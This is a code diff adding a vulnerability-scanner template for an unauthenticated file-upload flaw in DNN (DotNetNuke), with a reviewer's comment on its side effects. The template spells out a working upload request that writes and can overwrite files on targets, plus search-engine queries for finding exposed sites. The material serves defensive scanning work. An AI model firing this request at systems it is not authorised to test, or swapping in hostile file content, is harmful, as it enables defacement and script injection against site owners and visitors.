diff --git a/http/cves/2025/CVE-2025-64095.yaml b/http/cves/2025/CVE-2025-64095.yaml
new file mode 100644
index 000000000000..a10f467e516d
--- /dev/null
+++ b/http/cves/2025/CVE-2025-64095.yaml
@@ -0,0 +1,78 @@
+id: CVE-2025-64095
+
+info:
+ name: DNN - Unrestricted Arbitrary File Upload
+ author: DhiyaneshDk,pussycat0x
+ severity: critical
+ description: |
+ DNN (formerly DotNetNuke) \u003C 10.1.1 contains an unrestricted file upload vulnerability caused by the default HTML editor provider allowing unauthenticated file uploads and overwriting existing files, letting unauthenticated attackers deface websites and inject XSS payloads, exploit requires no authentication.
+ impact: |
+ Unauthenticated attackers can upload and overwrite files, leading to website defacement and cross-site scripting attacks.
+ remediation: |
+ Update to version 10.1.1 or later.
+ reference:
+ - https://github.com/h4x0r-dz/CVE-2025-64095---DNN-Unauthenticated-arbitrary-file-upload
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: dnnsoftware
+ product: dotnetnuke
+ shodan-query:
+ - "Set-Cookie: dnn_IsMobile"
+ - http.favicon.hash:-1465479343
+ fofa-query:
+ - app="dotnetnuke"
+ - "Set-Cookie: dnn_IsMobile"
+ - icon_hash="-1465479343"
+ tags: cve,cve2025,intrusive,file-upload,dnn
+
+variables:
+ filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - raw:
+ - |
+ POST /Providers/HtmlEditorProviders/DNNConnect.CKE/Browser/FileUploader.ashx HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=------------------------7RKjWLYyrhvUn2AA31fJQ3
+
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3
+ Content-Disposition: form-data; name="file"; filename="{{filename}}.png"
+ Content-Type: image/png
+
+ {{randstr}}
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3
+ Content-Disposition: form-data; name="storageFolderID"
+
+ 1
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3
+ Content-Disposition: form-data; name="portalID"
+
+ 0
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3
+ Content-Disposition: form-data; name="overrideFiles"
+
+ 1
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3
+ Content-Disposition: form-data; name="mode"
+
+ Default
+ --------------------------7RKjWLYyrhvUn2AA31fJQ3--
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{"group"'
+ - 'delete_type'
+ condition: and
+
+ - type: word
+ part: content_type
+ words:
+ - "text/plain"
+
+ - type: status
+ status:
+ - 200
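Review bot: The multipart body sends `overrideFiles` as `1` and the template never removes `{{filename}}.png`, so every scan leaves a persistent file in storage folder 1 of portal 0 and, on a name collision, would presumably replace an existing one. Detecting the unauthenticated upload does not appear to need the overwrite flag; if the handler answers the same way without it, send `0` there, and add a comment above `- raw:` such as `# Writes {{filename}}.png to the target and sends no cleanup request` so operators know what `intrusive` means for this template. The matchers also accept any 200 `text/plain` body containing `{"group"` and `delete_type` without referencing the upload; if the response echoes the stored name, adding `- '{{filename}}'` to the body words would tie the match to this request. Separately, `\u003C` inside the `|` block of `description` is not unescaped by YAML and will be displayed literally instead of `<`.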